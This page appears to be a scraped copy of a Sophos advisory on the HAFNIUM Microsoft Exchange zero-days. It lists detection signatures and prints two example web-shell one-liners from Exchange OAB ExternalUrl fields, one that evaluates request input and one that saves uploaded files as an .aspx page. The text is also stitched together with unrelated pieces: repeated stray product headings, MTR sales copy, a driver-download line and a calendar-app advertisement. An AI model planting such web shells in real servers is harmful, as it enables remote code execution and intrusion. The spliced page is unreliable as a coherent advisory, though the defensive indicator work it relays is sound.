Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

1. Sophos Network Threat Protection
2. Sophos Network Threat Protection Not Running
3. Sophos Network Threat Protection Update
4. Sophos Home Antivirus

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

1. See how the threat landscape is changing in our Security Threat Reports. From Sophos, the leader in antivirus, malware removal, encryption and network security.
2. Endpoint data is critical to the Sophos Managed Threat Response (MTR) team. However, to have the most complete picture of a customer’s network, analysts need to go beyond the endpoint and tap into the broadest range of telemetry to provide the best protection.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Protect Your Network Network threats are complex, but protecting your organization shouldn't be. Sophos is an industry leader in network and web security. Our UTM provides security all in one, including next-generation firewall capabilities, web filtering, VPN support, intrusion prevention, application control and more. Sophos is a security software and hardware company, that develops world-leading products for communication endpoint, encryption, network security, email security, mobile security and unified threat management. Sophos advantage is modularity – you can always consult dots. And choose the protection package according to your needs & requirements.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

• Troj/WebShel-L
• Troj/WebShel-M
• Troj/WebShel-N
• Troj/ASPDoor-T
• Troj/ASPDoor-U
• Troj/ASPDoor-V
• Troj/AspScChk-A
• Troj/Bckdr-RXD
• Troj/WebShel-O
• Troj/WebShel-P

Other payloads

• Mal/Chopper-A
• Mal/Chopper-B
• ATK/Pivot-B
• AMSI/PowerCat-A (Powercat)
• AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks Dearcry via:

• Troj/Ransom-GFE
• CryptoGuard

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antvirus (SAV) 2021-03-11 14:30 UTC

Sophos Network Threat Protection

Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC

Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC

Endpoint data is critical to the Sophos Managed Threat Response (MTR) team. However, to have the most complete picture of a customer’s network, analysts need to go beyond the endpoint and tap into the broadest range of telemetry to provide the best protection.

To ensure MTR operators have the most crucial data at their fingertips Sophos is introducing a new MTR Network Sensor, in addition to continuing investing in the already launched MTR Connector. These offerings extend visibility to MTR operators, so attackers have fewer places to hide.

Download the datasheet to learn more about MTR Connectors and the new MTR Network Sensor.

Network Visibility: MTR Network Sensor (available inNorth America only)

Sophos MTR Advanced customers have the option to deploy the MTR Network Sensor in order to gain network telemetry. The network sensor is an SF SW/Virtual network appliance and is ideally suited for organizations who are unable or unwilling to deploy Sophos XG Firewall. The sensor is deployed in non-blocking mode and cannot be used as a replacement for a firewall.

Sophos Network Threat Protection Not Running

The MTR Network sensor leverages the XG Firewall MTR Connector to generate MTR detections from ATP (Command & Control) and premium IDS events. Customers must enable Central Firewall Management and Central Firewall Reporting. These features come with 7 days of data storage in the Sophos Data Lake, which can be used by customers to perform queries and run reports. This is separate from the MTR detections and data retention used exclusively by the MTR team.

Network Visibility: Sophos Firewall MTR Connector

Sophos MTR Advanced customers have the ability to fully deploy Sophos XG Firewall across their environment or deploy XG Firewall in tap mode while also utilizing a non-Sophos firewall. Customers must manage their XG Firewalls in Sophos Central and use XG Central Firewall Reporting.

The Sophos Firewall MTR Connector generates MTR detections from the following network security events: ATP (Command & Control), IPS, Sophos AV (email, web, FTP), and Sophos Sandstorm (sandbox). Download realtek mobile phones & portable devices driver.

Calendarique features unified view showing both calendar events and reminders. Shows event's locations, notes and statistics. Offers complete events and reminders management. Simply slide out notification center or access Calendarique from Menu Bar to get an overview of any month. Calendar questions aptitude. Calendarique lets you quickly toggle multiple calendars and reminders on or off. Monthly calendar widget can be placed in macOS Status Menu or added to the Notification Center. Calendarique is fully localized in English, French, German, Italian, Spanish and Russian.

Sophos Network Threat Protection Update

Cloud Visibility: Sophos Cloud Optix MTR Connector

Sophos Home Antivirus

By adding cloud telemetry, customers will receive around-the-clock security monitoring of major cloud platforms by a dedicated team of cybersecurity experts. The Sophos Cloud Optix MTR Connector provides Sophos MTR operators with the visibility needed to quickly identify critical cloud security events used in breach attempts across Amazon Web Services, Microsoft Azure, and Google Cloud Platform environments. Events from Sophos Cloud Optix generate MTR detections, including anomalous IAM user login activity, outbound network traffic connections, and other high-risk activity. Additional threat detections can be added via integration with the Amazon GuardDuty service, which analyzes CloudTrail, DNS and VPC flow logs.